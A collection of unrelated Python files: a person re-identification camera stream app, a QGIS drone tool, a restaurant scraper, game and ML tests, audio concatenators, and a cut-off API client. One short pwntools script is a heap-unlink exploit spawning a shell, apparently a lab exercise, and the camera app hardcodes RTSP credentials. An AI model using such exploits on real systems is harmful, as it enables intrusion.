'format=(string)I420, framerate=(fraction)30/1 ! '
'nvvidconv ! '
'video/x-raw, width=(int){}, height=(int){}, '
'format=(string)BGRx ! '
'videoconvert ! appsink').format(width, height)
return cv2.VideoCapture(gst_str, cv2.CAP_GSTREAMER)
'''
reid_mode = cam_reid.reid_model()
# encode origin image
compare = cam_reid.Compare(model=reid_mode, origin_img="./image/origin")
origin_f, origin_name = compare.encode_origin_image()
tracker_list =[] # list for trackers
# list for track ID
track_id_list= deque(['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K'])
def open_cam_onboard(width, height):
gst_elements = str(subprocess.check_output('gst-inspect-1.0'))
if 'nvcamerasrc' in gst_elements:
# On versions of L4T prior to 28.1, add 'flip-method=2' into gst_str
gst_str = ('nvcamerasrc ! '
'video/x-raw(memory:NVMM), '
'width=(int)2592, height=(int)1458, '
'format=(string)I420, framerate=(fraction)30/1 ! '
'nvvidconv ! '
'video/x-raw, width=(int){}, height=(int){}, '
'format=(string)BGRx ! '
'videoconvert ! appsink').format(width, height)
elif 'nvarguscamerasrc' in gst_elements:
gst_str = ('nvarguscamerasrc ! '
'video/x-raw(memory:NVMM), '
'width=(int)1920, height=(int)1080, '
'format=(string)NV12, framerate=(fraction)30/1 ! '
'nvvidconv flip-method=0 ! '
'video/x-raw, width=(int){}, height=(int){}, '
'format=(string)BGRx ! '
'videoconvert ! appsink').format(width, height)
else:
raise RuntimeError('onboard camera source not found!')
return cv2.VideoCapture(gst_str, cv2.CAP_GSTREAMER)
def open_cam_rtsp(uri, width, height, latency):
gst_str = ('rtspsrc location={} latency={} ! '
'rtph264depay ! h264parse ! omxh264dec ! '
'nvvidconv ! '
'video/x-raw, width=(int){}, height=(int){}, '
'format=(string)BGRx ! '
'videoconvert ! appsink').format(uri, latency, width, height)
return cv2.VideoCapture(gst_str, cv2.CAP_GSTREAMER)
def box_iou2(a, b):
'''
Helper funciton to calculate the ratio between intersection and the union of
two boxes a and b
a[0], a[1], a[2], a[3] <-> left, up, right, bottom
'''
w_intsec = np.maximum (0, (np.minimum(a[1][0], b[1][0]) - np.maximum(a[0][0], b[0][0])))
h_intsec = np.maximum (0, (np.minimum(a[1][1], b[1][1]) - np.maximum(a[0][1], b[0][1])))
s_intsec = w_intsec * h_intsec
s_a = (a[1][0] - a[0][0])*(a[1][1] - a[0][1])
s_b = (b[1][0] - b[0][0])*(b[1][1] - b[0][1])
return float(s_intsec)/(s_a + s_b -s_intsec)
def assign_detections_to_trackers(trackers, detections, iou_thrd = 0.3):
'''
From current list of trackers and new detections, output matched detections,
unmatchted trackers, unmatched detections.
'''
IOU_mat= np.zeros((len(trackers),len(detections)),dtype=np.float32)
for t,trk in enumerate(trackers):
#trk = convert_to_cv2bbox(trk)
for d,det in enumerate(detections):
# det = convert_to_cv2bbox(det)
IOU_mat[t,d] = box_iou2(trk,det)
# Produces matches
# Solve the maximizing the sum of IOU assignment problem using the
# Hungarian algorithm (also known as Munkres algorithm)
matched_idx_tra, matched_idx_det = linear_assignment(-IOU_mat)
matched_idx = np.zeros((len(matched_idx_tra),2),dtype=np.int8)
for i in range(len(matched_idx_tra)):
matched_idx[i]=(matched_idx_tra[i],matched_idx_det[i])
unmatched_trackers, unmatched_detections = [], []
for t,trk in enumerate(trackers):
if(t not in matched_idx[:,0]):
unmatched_trackers.append(t)
for d, det in enumerate(detections):
if(d not in matched_idx[:,1]):
unmatched_detections.append(d)
matches = []
# For creating trackers we consider any detection with an
# overlap less than iou_thrd to signifiy the existence of
# an untracked object
for m in matched_idx:
if(IOU_mat[m[0],m[1]]<iou_thrd):
unmatched_trackers.append(m[0])
unmatched_detections.append(m[1])
else:
matches.append(m.reshape(1,2))
if(len(matches)==0):
matches = np.empty((0,2),dtype=int)
else:
matches = np.concatenate(matches,axis=0)
return matches, np.array(unmatched_detections), np.array(unmatched_trackers)
def draw_box_label(img, bbox_cv2, box_color=(0, 255, 255), personReID_info={'personID':'Unknown'}, show_label=True):
'''
Helper funciton for drawing the bounding boxes and the labels
bbox_cv2 = [left, top, right, bottom]
'''
#box_color= (0, 255, 255)
font = cv2.FONT_HERSHEY_SIMPLEX
font_size = 0.4
font_color = (0, 0, 0)
left, top, right, bottom = bbox_cv2[0], bbox_cv2[1], bbox_cv2[2], bbox_cv2[3]
# Draw the bounding box
cv2.rectangle(img, (left, top), (right, bottom), box_color, 4)
if show_label:
# Draw a filled box on top of the bounding box (as the background for the labels)
cv2.rectangle(img, (left-2, top-30), (right+2, top), box_color, -1, 1)
# Output the labels that show the x and y coordinates of the bounding box center.
text_ID = 'personID:' + personReID_info['personID']
cv2.putText(img,text_ID,(left,top-20), font, font_size, font_color, 1, cv2.LINE_AA)
text_x= 'x='+str((left+right)/2)
cv2.putText(img,text_x,(left,top-10), font, font_size, font_color, 1, cv2.LINE_AA)
text_y= 'y='+str((top+bottom)/2)
cv2.putText(img,text_y,(left,top), font, font_size, font_color, 1, cv2.LINE_AA)
return img
def handle_frames(frame):
global tracker_list
global max_age
global min_hits
global track_id_list
#detect hand
boxes, scores = detector_utils.detect_objects(frame,
detection_graph, sess)
# draw bounding boxes on frame
detector_utils.draw_box_on_image_washhand(num_hands_detect, score_thresh,
scores, boxes, im_width, im_height,
frame, sink_loc, patient_loc)
#detect person
detection_results = api.get_person_bbox(frame, thr=0.5)
x_box =[]
if len(tracker_list) > 0:
for trk in tracker_list:
x_box.append([(trk.box[0],trk.box[1]),(trk.box[2],trk.box[3])]) #should be changed into the right format instead of the .box format
matched, unmatched_dets, unmatched_trks = assign_detections_to_trackers(x_box, detection_results, iou_thrd = 0.2)
# Deal with matched detections
if matched.size >0:
for trk_idx, det_idx in matched:
z = detection_results[det_idx]
z = np.expand_dims([n for a in z for n in a], axis=0).T
tmp_trk= tracker_list[trk_idx]
tmp_trk.kalman_filter(z)
xx = tmp_trk.x_state.T[0].tolist()
xx =[xx[0], xx[2], xx[4], xx[6]]
x_box[trk_idx] = xx
tmp_trk.box =xx
tmp_trk.hits += 1
tmp_trk.no_losses = 0
# Deal with unmatched detections
if len(unmatched_dets)>0:
for idx in unmatched_dets:
z = detection_results[idx]
x1 = int(z[0][0])
y1 = int(z[0][1])
x2 = int(z[1][0])
y2 = int(z[1][1])
person = frame[y1:y2, x1:x2, :]
identify_name, score = compare.run(person, origin_f, origin_name)
if(identify_name in [ "MJ1", "MJ2", "MJ3", "MJ4", "MJ5"]):
identify_name = "Person_1"
elif(identify_name in ["QY1", "QY2", "QY3", "QY4", "QY5"]):
identify_name = "Person_2"
print("identify name:{}, score:{}".format(identify_name, round(1-score, 2)))
#generate a new tracker for the person
z = np.expand_dims([n for a in z for n in a], axis=0).T
tmp_trk = Tracker() # Create a new tracker
x = np.array([[z[0], 0, z[1], 0, z[2], 0, z[3], 0]]).T
tmp_trk.x_state = x
tmp_trk.predict_only()
xx = tmp_trk.x_state
xx = xx.T[0].tolist()
xx =[xx[0], xx[2], xx[4], xx[6]]
tmp_trk.box = xx
tmp_trk.id = track_id_list.popleft() # assign an ID for the tracker
tmp_trk.personReID_info['personID'] = identify_name #assign the reidentified personID for the tracker
tracker_list.append(tmp_trk)
x_box.append(xx)
# Deal with unmatched tracks
if len(unmatched_trks)>0:
for trk_idx in unmatched_trks:
tmp_trk = tracker_list[trk_idx]
tmp_trk.no_losses += 1
tmp_trk.predict_only()
xx = tmp_trk.x_state
xx = xx.T[0].tolist()
xx =[xx[0], xx[2], xx[4], xx[6]]
tmp_trk.box =xx
x_box[trk_idx] = xx
# The list of tracks to be annotated and draw the figure
good_tracker_list =[]
for trk in tracker_list:
if ((trk.hits >= min_hits) and (trk.no_losses <=max_age)):
good_tracker_list.append(trk)
x_cv2 = trk.box
trackerID_str="Unknown Person:"+str(trk.id)
if trk.personReID_info['personID'] == "Unknown":
frame= draw_box_label(frame, x_cv2,personReID_info={'personID':trackerID_str}) # Draw the bounding boxes for unknown person
else:
frame= draw_box_label(frame, x_cv2,personReID_info=trk.personReID_info) # Draw the bounding boxes for re-identified person
#book keeping
deleted_tracks = filter(lambda x: x.no_losses > max_age, tracker_list)
for trk in deleted_tracks:
track_id_list.append(trk.id)
tracker_list = [x for x in tracker_list if x.no_losses<=max_age]
# #the original codes
# for bbox in detection_results:
# logger.info('coordinates: {} {}. '.
# format(bbox[0], bbox[1]))
# x1 = int(bbox[0][0])
# y1 = int(bbox[0][1])
# x2 = int(bbox[1][0])
# y2 = int(bbox[1][1])
# person = frame[y1:y2, x1:x2, :]
# identify_name, score = compare.run(person, origin_f, origin_name)
# if(identify_name in [ "MJ1", "MJ2", "MJ3", "MJ4", "MJ5"]):
# identify_name = "Person_1"
# elif(identify_name in ["QY1", "QY2", "QY3", "QY4", "QY5"]):
# identify_name = "Person_2"
#
# print("identify name:{}, score:{}".format(identify_name, round(1-score, 2)))
#
# bounding_boxs.append([(x1,y1), (x2,y2), identify_name+' '+str(round(1-score, 2))])
# #img = cam_detection.draw_rectangle(img, (x1,y1,x2,y2), identify_name+' '+str(round((1-score), 2)))
# for obj in bounding_boxs:
# print(obj)
# cv2.putText(frame, obj[2], (obj[0][0], obj[0][1] - 5), cv2.FONT_HERSHEY_PLAIN, 1, (0, 255, 0), 2)
# frame = cv2.rectangle(frame, obj[0], obj[1], (0, 255, 0), 2)
return frame
def gen_frames(): # generate frame by frame from camera
#stream detection
#cap = open_cam_onboard(640, 480)
#uri = "rtsp://admin:admin@192.168.1.106:554/stream2"
uri = "rtsp://admin:edge1234@192.168.1.110:554/cam/realmonitor?channel=1&subtype=1"
cap = open_cam_rtsp(uri, 640, 480, 200)
if not cap.isOpened():
sys.exit('Failed to open camera!')
# allow the camera to warmup
#time.sleep(0.1)
frame_rate_calc = 1
#freq = cv2.getTickFrequency()
#print(freq)\
counter=0
while (cap.isOpened()):
#t1 = cv2.getTickCount()
counter+=1
#if counter % 12 !=0:
# print(counter)
# continue
t1 = time.time()
print ("before read:", time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))
if counter % 5 != 0:
ret, frame = cap.read()
print ("after read", time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))
continue
logger.info("FPS: {0:.2f}".format(frame_rate_calc))
#cv2.putText(frame, "FPS: {0:.2f}".format(frame_rate_calc), (20, 20),
# cv2.FONT_HERSHEY_PLAIN, 1, (255, 255, 0), 2, cv2.LINE_AA)
#result = api.get_person_bbox(frame, thr=0.6) #add functions to this line
frame = handle_frames(frame)
print ("after handle", time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))
t2 = time.time()
print("one frame takes {0:.2f}".format(t2-t1))
frame_rate_calc = 1 / (t2 - t1)
#if frame_rate_calc < 15:
# frame_rate_calc = 2*frame_rate_calc
cv2.putText(frame, "FPS: {0:.2f}".format(frame_rate_calc), (20, 20),
cv2.FONT_HERSHEY_PLAIN, 1, (255, 255, 0), 2, cv2.LINE_AA)
#if counter < 5:
# plt.imshow(frame[:, :, ::-1])
# plt.show()
# continue
# show the frame
#cv2.imshow("Stream from EdgeNX1", frame)
#key = cv2.waitKey(1) & 0xFF
#t2 = cv2.getTickCount()
#time1 = (t2 - t1) / freq
#frame_rate_calc = 1 / time1
#print("one frame takes {0:.2f}".format(t2-t1))
(flag, outputFrame) = cv2.imencode(".jpg", frame)
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + bytearray(outputFrame) + b'\r\n')
# if the `q` key was pressed, break from the loop
#if key == ord("q"):
# break
@app.route('/video_feed')
def video_feed():
#Video streaming route. Put this in the src attribute of an img tag
return Response(gen_frames(), mimetype='multipart/x-mixed-replace; boundary=frame')
@app.route('/')
def index():
"""Video streaming home page."""
return render_template('index.html')
if __name__ == '__main__':
img = cv2.imread('example.jpg')
img = handle_frames(img)
#plt.imshow(img[:, :, ::-1])
print("show frame")
#plt.show()
app.run(host='0.0.0.0', port='5000')
#gen_frames()
|
# -*- coding: utf-8 -*-
"""
Drone_copySelectedPhotos.py
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Leandro França'
__date__ = '2021-11-07'
__copyright__ = '(C) 2021, Leandro França'
from qgis.PyQt.QtCore import QCoreApplication
from qgis.core import (QgsApplication,
QgsProcessingParameterVectorLayer,
QgsGeometry,
QgsProcessing,
QgsProcessingParameterField,
QgsProcessingParameterString,
QgsProcessingParameterEnum,
QgsProcessingParameterBoolean,
QgsProcessingParameterFile,
QgsFeatureSink,
QgsProcessingException,
QgsProcessingAlgorithm,
QgsProcessingParameterFeatureSource,
QgsProcessingParameterFeatureSink)
from lftools.geocapt.imgs import Imgs
import os, shutil
from qgis.PyQt.QtGui import QIcon
class CopySelectedPhotos(QgsProcessingAlgorithm):
LOC = QgsApplication.locale()[:2]
def translate(self, string):
return QCoreApplication.translate('Processing', string)
def tr(self, *string):
# Traduzir para o portugês: arg[0] - english (translate), arg[1] - português
if self.LOC == 'pt':
if len(string) == 2:
return string[1]
else:
return self.translate(string[0])
else:
return self.translate(string[0])
def createInstance(self):
return CopySelectedPhotos()
def name(self):
return 'copyselectedphotos'
def displayName(self):
return self.tr('Copy selected files', 'Copiar arquivos selecionados')
def group(self):
return self.tr('Drones')
def groupId(self):
return 'drones'
def tags(self):
return self.tr('drones,fotografia,photography,blocks,copy,copiar,separate,separar,organize,organizar,filtrar,filter').split(',')
def icon(self):
return QIcon(os.path.join(os.path.dirname(os.path.dirname(__file__)), 'images/drone.png'))
txt_en = 'This tool makes it possible to copy or move files to a new folder from a point layer with file paths.'
txt_pt = 'Esta ferramenta possibilita copiar ou mover arquivos para uma nova pasta a partir de uma camada de pontos com os caminhos dos arquivos.'
figure = 'images/tutorial/drone_copySelectedFiles.jpg'
def shortHelpString(self):
social_BW = Imgs().social_BW
footer = '''<div align="center">
<img src="'''+ os.path.join(os.path.dirname(os.path.dirname(__file__)), self.figure) +'''">
</div>
<div align="right">
<p align="right">
<b>'''+self.tr('Author: Leandro Franca', 'Autor: Leandro França')+'''</b>
</p>'''+ social_BW + '''</div>
</div>'''
return self.tr(self.txt_en, self.txt_pt) + footer
POINTS = 'POINTS'
FILEPATH = 'FILEPATH'
OPTION = 'OPTION'
FOLDER = 'FOLDER'
def initAlgorithm(self, config=None):
self.addParameter(
QgsProcessingParameterVectorLayer(
self.POINTS,
self.tr('Points', 'Pontos'),
[QgsProcessing.TypeVectorPoint]
)
)
self.addParameter(
QgsProcessingParameterField(
self.FILEPATH,
self.tr('Field with file path', 'Campo com o caminho do arquivo'),
parentLayerParameterName=self.POINTS,
type=QgsProcessingParameterField.String
)
)
opt = [self.tr('Copy','Copiar'),
self.tr('Move','Mover')
]
self.addParameter(
QgsProcessingParameterEnum(
self.OPTION,
self.tr('Option', 'Opção'),
options = opt,
defaultValue= 0
)
)
self.addParameter(
QgsProcessingParameterFile(
self.FOLDER,
self.tr('Folder with raster files', 'Pasta com arquivos raster'),
behavior=QgsProcessingParameterFile.Folder,
defaultValue=None
)
)
def processAlgorithm(self, parameters, context, feedback):
pontos = self.parameterAsVectorLayer(
parameters,
self.POINTS,
context
)
if pontos is None:
raise QgsProcessingException(self.invalidSourceError(parameters, self.POINTS))
campo = self.parameterAsFields(
parameters,
self.FILEPATH,
context
)
if campo is None:
raise QgsProcessingException(self.invalidSourceError(parameters, self.FILEPATH))
columnIndex = pontos.fields().indexFromName(campo[0])
opcao = self.parameterAsEnum(
parameters,
self.OPTION,
context
)
destino = self.parameterAsFile(
parameters,
self.FOLDER,
context
)
if not destino:
raise QgsProcessingException(self.invalidSourceError(parameters, self.FOLDER))
# Verificar se tem arquivos selecionados
if pontos.selectedFeatureCount() <1:
raise QgsProcessingException(self.tr('At least one feature must be selected!', 'Pelo menos uma feição deve ser selecionada!'))
# Copiando arquivos selecionados para a nova pasta
total = 100.0 / pontos.selectedFeatureCount()
cont = 1
for pnt in pontos.getSelectedFeatures():
origem = pnt[columnIndex]
nome = os.path.split(origem)[-1]
if opcao == 0:
shutil.copy2(origem, os.path.join(destino, nome))
elif opcao == 1:
shutil.move(origem, os.path.join(destino, nome))
if feedback.isCanceled():
break
feedback.setProgress(int((cont) * total))
cont += 1
feedback.pushInfo(self.tr('Operation completed successfully!', 'Operação finalizada com sucesso!'))
feedback.pushInfo(self.tr('Leandro Franca - Cartographic Engineer', 'Leandro França - Eng Cart'))
return {}
|
from typing import Literal, Sequence, SupportsFloat, SupportsInt, Union
from numpy import (float16, float32, float64, int0, int8, int16, int32, int64,
ndarray)
from pandas import DataFrame, Series
# Numerical
NumpyFloat = Union[float64, float32, float16] # Numpy Float types
NumpyInt = Union[int0, int8, int16, int32,
int64] # Numpy Int types
BuiltinNumbers = Union[int, float] # Builtin number types
# Any numerical, or numpy numerical types
Numerical = Union[BuiltinNumbers, NumpyFloat, NumpyInt, SupportsInt, SupportsFloat]
Int = Union[NumpyInt, int]
# External types for set-like objects
ExternalSets = Union[DataFrame, Series, ndarray]
BuiltinSets = Union[list, tuple, set] # Builtin set-like types
SequentialObject = Union[ExternalSets, BuiltinSets] # All set-like objects
# A Union of sequences that can be used alonside numerical values
Data = Union[SequentialObject, Numerical]
X_Data = Sequence[Sequence[Numerical]]
# Maths Types
Distance = Literal["euclidean", "manhattan"] # Distance function names
|
import json
import re
import os
from time import sleep
from requests_html import HTMLSession
from selenium import webdriver as wb
session = HTMLSession()
text_re = r"jsonData = (.*);"
regex = r"initData = (.*);"
options = wb.ChromeOptions()
def crawl_cmt(link, driver_path):
driver = wb.Chrome(executable_path=driver_path, options=options)
driver.get(link)
while True:
try:
clickObj = driver.find_elements_by_xpath(
'/html/body/div[2]/div[2]/div[2]/section/div/div/div/div/div[1]/div/div[2]/div[1]/div/div/a')
clickObj[0].click()
except IndexError:
print("Load full cmt")
break
full_cmt = driver.find_elements_by_xpath(
'/html/body/div[2]/div[2]/div[2]/section/div/div/div/div/div[1]/div/div[2]/div[1]/div/ul')
full_cmt_by_text = ''
for k in full_cmt:
full_cmt_by_text = full_cmt_by_text + k.text
driver.close()
return full_cmt_by_text
def get_full_menu(store_link, driver_path):
driver1 = wb.Chrome(executable_path=driver_path, options=options)
driver1.get('chrome://settings/')
driver1.execute_script('chrome.settingsPrivate.setDefaultZoom(0.1);')
sleep(1)
driver1.get(store_link)
sleep(1)
# change zoom for web driver
sleep(1)
driver1.execute_script("document.body.style.zoom='50%'")
driver1.get(store_link)
sleep(1)
menu_data = driver1.find_elements_by_class_name('item-restaurant-row')
menu: str = ''
for k in menu_data:
menu = menu + k.text
driver1.close()
return menu
"""
Function name: Get_menu
:param val: Str
:return: res: dict
Format: {"data": [<sub_format>]}
Sub_format:
name: Str: dish's name
price: Str: dish's price
details: Str: additional information about dishes
"""
def get_menu(val):
menu_list = str.split(val, '\n')
res = {'data': []}
cur = {'details': None}
count_param = 0
for cmt in menu_list:
if count_param == 0:
if cmt.startswith("+"):
cur['name'] = cmt[1:]
count_param += 1
elif cmt.startswith("Hết hàng"):
cur['name'] = cmt[8:]
count_param += 1
elif count_param == 0:
cur['name'] = cmt
count_param += 1
elif count_param > 0:
if '0' <= cmt[0] <= '9' and cmt[-1] == 'đ':
cmt = cmt.replace(',', '')
cur['price'] = cmt
res['data'].append(cur)
cur = {'details': None}
count_param = 0
else:
cur['details'] = cmt
return res
"""
Function name: Get_cmt
parse comment
:param val: Str
:return: res: dict:
Format: {"data": [<sub_format>]}
Sub_format:
name: Str: customer name
rate: Float: customer rate for diner
device: customer device use to comment
cmt: content of the comment
"""
def get_cmt(val):
cmt_list = str.split(val, '\n')
res = {'data': []}
cur = {'details': None}
count_param = 0
for cmt in cmt_list:
if cmt == "Thích" or cmt == "Thảo luận" or cmt == "Báo lỗi":
if count_param > 0:
res['data'].append(cur)
cur = {'details': None}
count_param = 0
elif cmt.startswith("- Đây"):
cur['details'] = cmt
res['data'].append(cur)
cur = {'details': None}
count_param = 0
else:
if count_param == 0:
if len(cmt) != 3:
continue
cur['rate'] = float(cmt)
elif count_param == 1:
cur['name'] = cmt
elif count_param == 2:
cur['device'] = cmt
elif count_param == 3:
cur['cmt'] = cmt
elif count_param > 3:
cur['cmt'] += cmt
count_param += 1
return res
def get_full_information(store_link, driver_path):
link_foody_store = 'https://www.foody.vn{}'.format(store_link)
link_menu = 'https://www.now.vn{}'.format(store_link)
# cmt = crawl_cmt(link_foody_store, driver_path)
menu = get_full_menu(link_menu, driver_path)
rb = session.get(link_foody_store)
store_inf_text_link: str = rb.text
# print(text_re.match(text_str))
matches = re.finditer(regex, store_inf_text_link, re.MULTILINE)
need_data = ''
for matchNum, match in enumerate(matches, start=1):
for groupNum in range(0, len(match.groups())):
groupNum = groupNum + 1
need_data = match.group(groupNum)
# print(r.text)
data = json.loads(need_data)
time_do = []
for k in data['OpeningTime']:
time_do.append('{}'.format(k['TimeOpen']['Hours']) + ':' + '{}'.format(
k['TimeOpen']['Minutes']) + '-' + '{}'.format(k['TimeClose']['Hours']) + ':' + '{}'.format(
k['TimeClose']['Minutes']))
review_point = []
for point in data['AvgPointList']:
review_point.append({point['Label']: point['Point']})
try:
information = {
'name': data['Name'],
'address': data['Address'],
'city': data['City'],
'district': data['District'],
'priceMin': data['PriceMin'],
'priceMax': data['PriceMax'],
'Time': time_do,
'review_point': review_point,
'menu': get_menu(menu),
# 'cmt': get_cmt(cmt),
'website': link_foody_store,
}
except IOError:
print("Error")
information = None
return information
def crawl_data_from(data_link: str, dest_link: str, driver_path: str, limit: int = 500, path_id: int = 0):
print("Crawl Data from {}, save to {}, limit by {}".format(data_link, dest_link, limit))
with open(data_link, 'r', encoding='utf-8') as f:
cnt = 0
t = f.read()
s = t.count('\n')
start = int(s / 100) * path_id
t = t.split("\n")
for i, line in enumerate(t):
if i < start:
continue
elif i >= int(s / 100) * (path_id + 1):
break
elif cnt >= limit:
break
line = line.strip('\n')
diner_name = line.split("/")[-1]
try:
file = open(dest_link + "/" + diner_name + ".json", "w", encoding="utf-8")
value = get_full_information(line, driver_path)
try:
json.dump(value, file, ensure_ascii=False, indent=4)
cnt += 1
if cnt >= limit:
break
except IOError:
print("Some error occur at " + diner_name)
except Exception as e:
print(str(e))
finally:
file.close()
def crawl(load_data_path: str, save_data_path: str, driver_path: str, limit: int, path_id: int = 0):
if not os.path.exists(load_data_path):
raise Exception("Data path not found")
if not os.path.exists(save_data_path):
os.mkdir(save_data_path)
slist = os.listdir(load_data_path)
for name in slist:
filename, ext = os.path.splitext(name)
if not os.path.exists(save_data_path + "/" + filename + "_{}".format(str(path_id))):
os.mkdir(save_data_path + "/" + filename + "_{}".format(str(path_id)))
current_save_data_path = save_data_path + "/" + filename + "_{}".format(str(path_id))
crawl_data_from(load_data_path + "/" + name, current_save_data_path, driver_path, limit=limit, path_id=path_id)
def craw_in_range(load_data_path: str, save_data_path: str, driver_path: str,
limit: int, left: int = 0, right: int = 100):
for i in range(left, right + 1):
print("Start crawl at epoch {}".format(str(i)))
crawl(load_data_path, save_data_path, driver_path, limit, i)
print("Complete crawl at epoch {}".format(str(i)))
|
from django.test import TestCase
from core.models.base import OrderType, OutcomeType, PieceType
from core.game import create_new_pieces
from core.tests import DiplomacyTestCaseMixin
class TestCreateNewPieces(TestCase, DiplomacyTestCaseMixin):
def setUp(self):
self.variant = self.create_test_variant()
self.game = self.create_test_game(variant=self.variant)
self.turn = self.create_test_turn(game=self.game, processed=True)
self.england = self.variant.nations.create(name='England')
self.france = self.variant.nations.create(name='France')
self.london = self.create_test_territory(variant=self.variant, name='London')
self.paris = self.create_test_territory(variant=self.variant, name='Paris')
def test_create_new_pieces_no_orders(self):
pieces = create_new_pieces(self.turn)
self.assertEqual(pieces, [])
def test_create_new_pieces_failing_order(self):
self.turn.orders.create(
source=self.london,
outcome=OutcomeType.FAILS,
nation=self.england,
type=OrderType.BUILD,
piece_type=PieceType.ARMY,
)
pieces = create_new_pieces(self.turn)
self.assertEqual(pieces, [])
def test_create_new_pieces_army(self):
self.turn.orders.create(
source=self.london,
outcome=OutcomeType.SUCCEEDS,
nation=self.england,
type=OrderType.BUILD,
piece_type=PieceType.ARMY,
)
pieces = create_new_pieces(self.turn)
self.assertEqual(len(pieces), 1)
piece = pieces[0]
self.assertEqual(piece.nation, self.england)
self.assertEqual(piece.game, self.game)
self.assertEqual(piece.type, PieceType.ARMY)
def test_create_new_fleet(self):
self.turn.orders.create(
source=self.london,
outcome=OutcomeType.SUCCEEDS,
nation=self.england,
type=OrderType.BUILD,
piece_type=PieceType.FLEET,
)
piece = create_new_pieces(self.turn)[0]
self.assertEqual(piece.type, PieceType.FLEET)
def test_create_both_types_different_nations(self):
self.turn.orders.create(
source=self.london,
outcome=OutcomeType.SUCCEEDS,
nation=self.england,
type=OrderType.BUILD,
piece_type=PieceType.ARMY,
)
self.turn.orders.create(
source=self.paris,
outcome=OutcomeType.SUCCEEDS,
nation=self.france,
type=OrderType.BUILD,
piece_type=PieceType.FLEET,
)
pieces = create_new_pieces(self.turn)
self.assertEqual(len(pieces), 2)
def test_create_both_types_same_nation(self):
self.turn.orders.create(
source=self.london,
outcome=OutcomeType.SUCCEEDS,
nation=self.england,
type=OrderType.BUILD,
piece_type=PieceType.ARMY,
)
self.turn.orders.create(
source=self.paris,
outcome=OutcomeType.SUCCEEDS,
nation=self.england,
type=OrderType.BUILD,
piece_type=PieceType.FLEET,
)
pieces = create_new_pieces(self.turn)
self.assertEqual(len(pieces), 2)
|
from spiral.core.foundation import TestApp
from spiral.core.ml import MLHandler, MLInterface
from pytest import raises
# module tests
class TestMLInterface:
def test_interface(self):
assert MLInterface.Meta.interface == "ml"
class TestMLHandler:
def test_subclassing(self):
class MyMLHandler(MLHandler):
class Meta:
label = "my_ml_handler"
def random_forest(self):
pass
h = MyMLHandler()
assert h._meta.interface == "ml"
assert h._meta.label == "my_ml_handler"
# app functionality and coverage tests
def test_unproviding_handler():
class BogusHandler(MLHandler):
class Meta:
label = "bogus"
with TestApp() as app:
msg = "Can't instantiate abstract class .* with abstract methods"
with raises(TypeError, match=msg):
app.handler.register(BogusHandler)
|
import sys
import pandas as pd
from . import option, data, yahoo
def main():
opts = option.build_parser().parse_args()
# pandas config
pd.set_option("display.float_format", lambda x: f"{x:f}")
pd.set_option("display.max_rows", None)
pd.set_option("display.max_columns", None)
stocks = [yahoo.Stock(s) for s in yahoo.get_stocks_with_earnings_between(opts.start, opts.end)]
for stock in stocks:
if data.evaluate(stock):
print(stock.ticker)
return 0
if __name__ == "__main__":
sys.exit(main())
|
import torch
from torch import Tensor
from radiomixer.io.signal import SignalFeature
from radiomixer.transforms.concatenator.concatenator import Concatenator
from radiomixer.transforms.transform import TransformType
class SummationConcatenator(Concatenator):
"""
Sequentially concatenate diffetent segments
with randomly sampled silence between the segments
"""
def __init__(self):
super().__init__(TransformType.SummationConcatenator)
def _concatenate(self, signals: list) -> SignalFeature:
"""
It is assumed that input signals have the same lengths
hence current concatenation of the signal is simple
sumamtion.
"""
parameters, labels, files = [], [], []
signal_out = torch.zeros(signals[-1].data.shape)
for signal in signals:
data = signal.data
signal_out += data
labels.append([signal.parameters["label"]] * data.shape[-1])
parameters.append(signal.parameters)
files.append(signal.file)
signal = SignalFeature(sample_rate = signals[-1].sample_rate,
data = signal_out,
data_features = None,
file = files,
parameters = parameters,
parameters_own={
"duration":signal_out.shape[1],
"labels": labels}) #"
return signal
# ---------------------------SequentialConcatenator---------------------------
class SequentialConcatenator(Concatenator):
"""
Sequentially concatenate diffetent segment
with randomly sampled silence between the segments
"""
def __init__(self):
super().__init__(TransformType.SEQUENTIALCONCATENATOR)
def _concatenate(self, signals: list) -> SignalFeature:
n_signals = len(signals)
# generate silence
silences_lengths = signals[-1].parameters['silences_lengths']
silences = [torch.zeros((1,l)) for l in silences_lengths]
# generate final audio and labels
data, labels = [], []
for idx, signal in enumerate(signals):
data.append(signal.data)
labels.extend([signal.parameters['label']]*signal.data.shape[1])
if idx == n_signals-1:
pass
else:
data.append(silences[idx])
labels.extend([0]*silences[idx].shape[1])
return self._create_Signal(data = data,
labels = labels,
signals = signals)
def _create_Signal(self, data: Tensor, labels: list , signals:list) -> SignalFeature:
"""
Create SignalFeature object with
all infromation from which final
audio were created.
:data: Final audio
:labels: Labels
:signals: list of Signals from which final audio were crated
"""
sample_rate = 0
files, parameters = [], []
for signal in signals:
sample_rate += signal.sample_rate
files.append(signal.file)
parameters.append(signal.parameters)
audio = torch.concat(data, dim=1)
signal = SignalFeature(sample_rate = sample_rate/len(signals),
data = audio,
labels = labels,
data_features = None,
file = files,
parameters = parameters,
parameters_own={"duration":audio.shape[1]})
return signal
|
from pwn import *
p = process('./unlink')
p.recvuntil('stack address leak: ')
stack_addr = int(p.recvline()[2:], 16)
log.success('stack: {:#x}'.format(stack_addr))
p.recvuntil('heap address leak: ')
heap_addr = int(p.recvline()[2:], 16)
log.success('heap: {:#x}'.format(heap_addr))
p.recvline()
# gap between chunks: 0x18
target_addr = stack_addr + 0x10
target_value = heap_addr + 8 + 4
shell_addr = 0x080484eb
p.send(p32(shell_addr) + 'a'*12 + p32(target_value) + p32(target_addr))
p.interactive()
|
# -*- coding: utf-8 -*-
"""
reqs.py
=============================================
The request client for handling GETs to dagpi
"""
from typing import Optional
import requests
from .errors import DagpiException
class ReqClient():
"""
Main class for handling requests with dagpi
Parameters
----------
authorization
String containing dagpi token
session
Optional requests.session to use for requests
"""
def __init__(self, authorization: str, session: Optional[requests.Session] = None) -> None:
self.auth = authorization
self.url = 'https://api.dagpi.xyz'
self.user_agent = f'dagpi.py v1.0.0 {requests.utils.default_headers()["User-Agent"]}'
self.session = session or requests.Session()
self.headers = {
'Authorization': self.auth,
